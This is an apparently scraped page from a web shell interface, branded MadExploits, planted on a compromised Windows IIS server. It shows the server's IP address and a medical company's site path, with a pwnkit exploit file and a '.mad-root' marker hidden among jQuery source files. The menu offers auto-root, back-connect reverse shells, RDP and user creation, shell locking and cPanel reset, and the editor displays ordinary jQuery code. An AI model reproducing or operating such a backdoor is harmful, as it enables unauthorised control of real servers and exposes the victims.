Windows NT 5XH5ME 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: | : 3.144.35.187
Cant Read [ /etc/named.conf ]
8.0.30
IWPD_574(rhy10449)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
D: /
Inetpub /
vhosts /
rhythmmedical.in /
httpdocs /
superadm /
bower_components /
jquery /
src /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
var
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
DOMEval.js
292
B
-rw-rw-rw-
access.js
1.23
KB
-rw-rw-rw-
init.js
3.24
KB
-rw-rw-rw-
nodeName.js
178
B
-rw-rw-rw-
parseHTML.js
1.57
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
ready-no-deferred.js
2.18
KB
-rw-rw-rw-
ready.js
2.05
KB
-rw-rw-rw-
readyException.js
168
B
-rw-rw-rw-
stripAndCollapse.js
384
B
-rw-rw-rw-
support.js
631
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : access.js
define( [ "../core" ], function( jQuery ) { "use strict"; // Multifunctional method to get and set values of a collection // The value/s can optionally be executed if it's a function var access = function( elems, fn, key, value, chainable, emptyGet, raw ) { var i = 0, len = elems.length, bulk = key == null; // Sets many values if ( jQuery.type( key ) === "object" ) { chainable = true; for ( i in key ) { access( elems, fn, i, key[ i ], true, emptyGet, raw ); } // Sets one value } else if ( value !== undefined ) { chainable = true; if ( !jQuery.isFunction( value ) ) { raw = true; } if ( bulk ) { // Bulk operations run against the entire set if ( raw ) { fn.call( elems, value ); fn = null; // ...except when executing function values } else { bulk = fn; fn = function( elem, key, value ) { return bulk.call( jQuery( elem ), value ); }; } } if ( fn ) { for ( ; i < len; i++ ) { fn( elems[ i ], key, raw ? value : value.call( elems[ i ], i, fn( elems[ i ], key ) ) ); } } } if ( chainable ) { return elems; } // Gets if ( bulk ) { return fn.call( elems ); } return len ? fn( elems[ 0 ], key ) : emptyGet; }; return access; } );
Close